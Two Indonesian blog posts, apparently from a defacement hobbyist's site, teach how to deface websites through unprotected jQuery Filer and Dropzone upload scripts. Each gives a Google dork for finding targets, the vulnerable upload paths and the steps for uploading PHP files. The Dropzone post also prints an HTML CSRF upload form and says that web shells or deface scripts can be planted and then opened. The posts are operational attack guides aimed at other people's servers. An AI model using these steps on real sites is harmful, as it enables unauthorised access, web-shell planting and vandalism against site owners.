Deface Metode Jquery filer file upload

Deface Metode Jquery filer file upload

Darmawan Ilham Ramadhan       1 comment   

Permisi malam ini update tutorial lagi

Kali ini adalah tutorial Deface metode jquery filer file upload

Dikarenakan saya malas ngetik jadi langsung saja siapkan bahan bahan yang dibutuhkan

1.      Dork

2.      Pc / laptop/ hp

3.      Koneksi internet

4.      Csrf

Oke mari kita mulai

Buka web browser kamu terus buka google.com habis itu langsung masukan dork nya

Inurl:/jquery.filer/examples/

Kalo sudah nemu target nya langsung aja masuin exploitnya

Site,org/[path/jquery.filer/examples/default/php/form_upload.php

Untuk exploit yang diatas upload filenya menggunakan csrf

Atau bisa lebih mudah dengan

Site,org/[path/jquery.filer/examples/default/

Untuk exploit yg ini lebih mudah karena kita langsung upload saja filenya tampilannya akan seperti ini

Jika sudah begitu langsung saka klik browse > pilih file (ext .php, .html, .jpg,  .pdf, dll) > langsung saja upload jika sukses upload maka tampilan nya akan jadi seoerti ini

Untuk akses filenya

Site,org/[path/jquery.filer/uploads/namafile.php

jika menggunakan csrf maka akan jadi seperti ini

Isikan URL dengan site target kalian tadi, isi POST File dengan files[] kemudian klick Lock!

Jika sudah, pilih file yang akan diupload, kemudian upload file kalian dengan klik Upload, tunggu proses upload sampai dengan selesai. Jika upload sukses maka akan tampil seperti ini

Sekian tutorial kali ini, jika ada pertanya silahkan tinggalkan komentar.

Tolong bantu share ya

Terima Kasih

Mugi-Chan09

Deface Metode CSRF Dropzone File Upload

Deface Metode CSRF Dropzone File Upload

Darmawan Ilham Ramadhan       Comment   

Minasan, kon'nichiwa

Untuk update kali ini masih bikin tutorial dulu, males rasanya mau bikin yang lain. Tutorial kali ini adalah Deface metode CSRF Dropzone File Upload. Sebeneranya Metode CSRF Dropzone File Upload ini sebenarnya mudah hampir sama seperti file upload pada umumnya. Tapi semua kembali pada keberuntungan dan skill kalian

Lansung saja kita siapkan bahan bahan nya

1.      PC / laptop / HandPhone

2.      Internet Akses

3.      CSRF (saya make CSRF Online)

Kalo sudah siap semua bahannya langsung saja dimulai tutorial nya

Buka browser kalian kemudian buka goole,com. Jika sudah masukan Dork / kata kunci

Disini dork yang saya pakai adalah inurl:/dropzone/uploads/

Lihat pada gambar

Jika menurut kalian pada pencarian ALL hasilnya kurang memuaskan kalian silahkan cari pada bagian Images, siapa tau dapet hasil banyak

Nah lanjut ke tutorial nya

Setelah dapat web yang mnurut kalian vuln langsung aja masukin exploitnya

Exploit: /dropzone/upload.php

Contoh: sayangmantan,tk/[path]/dropzone/upload.php

Lihat pada gambar

Setelah dimasukkan exploitnya nanti bakal ketahuan Vuln atau tidak, untuk exploit Metode Dropzone File Upload ini jika Vuln maka aka Blank ( tidak tampil apa apa)

Lihat gambar

Nah kalo tampilan diatas berarti vuln, kalo sudah ketahuan vuln nya langsung saja kita masukan ke CSRF ditutorial saya, saya selalu menggunakan csrf online karena kebih mudah.

<form method="POST" action="http://sayangmantan,tt/[path]/dropzone/upload.php "

enctype="multipart/form-data">

<input type="file" name="file" /><button>Upload</button>

</form>

Simpan script diatas dengan format html, contoh dropzone.html

Disini saya langsung menggunakan CSRF Online, jadi langsung menyesuaikan saja

Masukkan URL target dibagian URL dan isikan POST File dengan file

Jika sudah langsung klik Lock!

Setelah dilock pilih file yang akan diupload disini kita bisa langsung upload file berekstensi .php ,html . txt .jpg .jpeg .png. kalian juga bisa upload shell / script deface kalian disini

Tunggu sampai proses upload selesai

Jika sudah selesai kalian bisa langsung akses file yang sudah diupload tadi. Letak file biasanya ada pada dir:/dropzone/uploads/namafile.php

Contoh:http://sayangmantan,tk/[path]/dropzone/uploads/namafile.php

Terkadang file sudah diupload nama file tersebut akan berubah secara otomatis

Lihat gambar

Gambar diatas menunjukan bahwa saya sudah sukses melakukan upload file, dengan nama yang sudah dirubah secara otomatis

Kemudian akses file nya kita gunakan nama file yang sudah dirubah tadi

Lihat gambar

Selamat mencoba, jika menurut kalian tutorial ini berguna silahkan dishare

Terima Kasih